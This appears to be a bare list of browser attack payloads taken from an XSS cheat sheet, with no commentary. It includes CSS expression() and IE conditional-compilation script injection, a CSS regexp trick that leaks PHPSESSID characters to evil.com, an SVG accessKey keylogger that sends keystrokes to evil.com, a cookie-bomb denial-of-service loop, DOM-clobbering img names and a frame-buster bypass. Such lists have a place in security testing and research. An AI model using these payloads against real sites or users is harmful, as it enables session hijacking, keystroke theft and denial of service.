<p style=color:expression(alert(1))>
IN: <p style="font-family":'\22\3bx:expression(alert(1))/*'">
OUT: <P style="FONT-FAMILY: ; x: expression(alert(1))"></P>
@-moz-document regexp(".*PHPSESSID=0.*"){
ul li:nth-child(1){background:url(//evil.com/?character:0#position:0)}
}
@-moz-document regexp(".*PHPSESSID=.0.*"){
ul li:nth-child(2){background:url(//evil.com/?character:0#position:1)}
}
<svg height="0px">
<image xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="none">
<set attributeName="xlink:href" begin="accessKey(a)" to="//evil.com/?a" />
...
<set attributeName="xlink:href" begin="accessKey(z)" to="//evil.com/?z" />
</image>
</svg>
<script>
/*@cc_on @*/
/*@
document.write("JavaScript version: " + @_jscript_version + ".");
document.write("<br />");
@if (@_win32)
document.write("Running on the 32-bit version of Windows.");
@elif (@_win16)
document.write("Running on the 16-bit version of Windows.");
@else
document.write("Running on a different operating system.");
@end
@*/
</script>
<script>@set@a=1alert(1)</script>
var pollution = Array(4000).join('a');
for(var i=1;i<99;i++){
document.cookie='bomb'+i+'='+pollution+';'
}
<img src="#" name="user-content-top">
<img src="#" name="user-content-window">
<img src="#" name="user-content-location">
<img src="#" name="user-content-document">
<img src="#" name="user-content-history">
<img src="#" name="user-content-screen">
<img src="#" name="user-content-postMessage">
<img src="#" name="user-content-atob">
<img src="#" name="user-content-onload">
<img src="#" name="user-content-onkeyup">
<img src="#" name="user-content-onkeypress">
<img src="#" name="user-content-onkeydown">
<img src="#" name="user-content-images">
<img src="#" name="user-content-head">
<img src="#" name="user-content-body">
<img src="#" name="user-content-cookie">
<img src="#" name="user-content-URL">
<img src="#" name="user-content-domain">
<img src="#" name="user-content-referrer">
<img src="#" name="user-content-title">
<script>
if(top!=self){
top.location=self.location
}
</script>
<form name=self location="javascript:alert(1)"></form>
<script>
if(top!=self){
top.location=self.location
}
</script>